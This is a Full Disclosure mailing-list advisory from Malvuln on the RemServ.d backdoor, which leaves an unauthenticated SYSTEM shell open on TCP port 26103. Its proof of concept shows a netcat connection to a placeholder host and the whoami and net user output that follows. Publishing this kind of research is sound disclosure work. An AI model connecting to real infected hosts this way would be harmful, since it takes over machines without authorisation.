[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Backdoor.Win32.RemServ.d / Unauthenticated Remote Command Execution
From:       malvuln <malvuln13 () gmail ! com>
Date:       2022-11-12 2:54:13
Message-ID: CAAHK0WQbqz5Ogp+bAnPv7x7pxG+RWag+yDYHhJjWenZjNdEDnw () mail ! gmail ! com
[Download RAW message or body]

Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source:
https://malvuln.com/advisory/05a082d441d9cf365749c0e1eb904c85.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.RemServ.d
Vulnerability: Unauthenticated Remote Command Execution
Family: RemServ
Type: PE32
MD5: 05a082d441d9cf365749c0e1eb904c85
Vuln ID: MVID-2022-0655
Disclosure: 11/11/2022
Description: The malware creates a service "RSMSS" that runs as SYSTEM and
listens on TCP port 26103. Remote attackers who can connect to an infected
host will get back a shell as "nt authority\system".

Exploit/PoC:
C:\>nc64.exe x.x.x.x 26103
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\>whoami
whoami
nt authority\system

C:\>net user
net user

User accounts for \\

----------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
Victim                   WDAGUtilityAccount
The command completed with one or more errors.

Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic